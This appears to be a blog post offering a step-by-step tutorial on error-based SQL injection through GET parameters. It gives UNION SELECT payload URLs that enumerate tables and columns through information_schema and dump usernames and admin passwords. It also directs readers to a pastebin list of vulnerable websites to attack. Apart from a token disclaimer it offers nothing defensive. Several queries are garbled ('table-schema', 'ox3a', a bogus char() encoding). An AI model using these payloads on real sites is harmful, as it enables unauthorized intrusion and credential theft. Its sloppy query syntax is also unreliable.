Header Ads

SQL INJECTION art of hacking website


Some introduction about sql injection 
Generally their are several way to hack a website , one of them is Sql Injection , actually it is nothing but applying the simple simple sql query on the website , but how ????  so for that we need to know about the webpage behavior as well as this kind of attack is on application layer i.e. is your webpage on which you are going to attack and exploiting the data or dumping the database as well as you can delete the data from the data base also their are several kind of sql injection methods but according to webpage it is generally divided into two type GET method based or POST method based in that it is further divided for GET method till now their are some 10 type and for POST method it may be same or some more method .

here i will show you how to dump data from the database with GET method

sql injection with GET method based on error , the error may be any kind  :

so let's start

1) first check vulnerability ..the very main and tedious task if you are able to get the vulnerabilities the you can achived your goal for finding vulnerabilities give some crapy i/o after finishing or ending the URL and if it is producing some error the the page is vulnerable

Ex: www.website.com/help.php?id=1\   (here in this example i putted \ as crapy i/p you can also put "  ,  '  and any thing )

2)Then find out the no of colunm by "order by" command and then use no. (ex:-www.wesite.com/?id=49 order by 1-) and so on for no of colunm till that we ill get an error message.

3) Now find most vulnerable column by using "union select all" for all no of column.(ex:-www.wesite.com/?id=49 union select all 1,2,3...-)

if this display an error/blank page then move to next site or
if it display a couple numbers on page ,congrates the site is vulnerable.

4)now we need to find tables.


a.) As table always lies into information_schema.table's database so perform the query.....

(ex:-www.wesite.com/?id=49 union select all 1,2,3...  table_name from information_schema.tables where table-schema=database)

b.) Now most vulnerable column is "n" so we put table_name in place of "n"

c.) It ill only show the first table name which lying in the database at the top. But to show all the tables "group_concat(table_name)" function is used.

d.) (ex:-www.wesite.com/?id=49 union select all 1,2,3...  group_concat(table_name )from information_schema.tables where table-schema=database()).

e.) we got the no of 'user or username' ,'docs' etc..tables

5) Now we need to find the column from the desired table. here it is 'user'.

a.) The input string need to be converted into decimal/ascii equivalent inorder to communicate with the database .

b.) Now may use online help or any convertor to convertany string to decimal/ascii equivalent .

c.) with 'user' as input the ascii value is somthing 12 34 99 22.. and so on ..

d.) (ex:-www.wesite.com/?id=49 union select all 1,2,3...  table_name from information_schema.colunm where table_name=char(12 34 99 22..))

e.)"group_concat" used for all colunm and since we are concerned with column so "information_schema.colunm" is used insted of "information_schema.table".

f.) Here we got 'id,user' as the colunm of table 'user'.

g.) In order to retrive datas it is needed to replace group_concat(column_name) with group_concat(id,ox3a,username) from username "ox3a" is just the colon and that will seprate the content which we will retrive.
(ex:-www.wesite.com/?id=49 union select all 1,2,3...  group_concat(id,ox3a,username) from user.

* so all ids,name,username values on the screen .similarly if you get the dmin table and you found some columns of admin_name and password then you have to implement the query as "group_concat(admin_name,ox3a,password) from admin here admin_name and password are the column and admin is the table name.


This is only one kind of sql injection attack the remaining we will discuss in our next tutorial till that use this tutorial for learning as for getting sql vulnerable website go to http://pastebin.com/GM9ZCg6A






enjoy

 all the above tutorial is for educational purpose not for any bad activity if any one will use as bad activity then for that this tutorial is not responsable 
Powered by Blogger.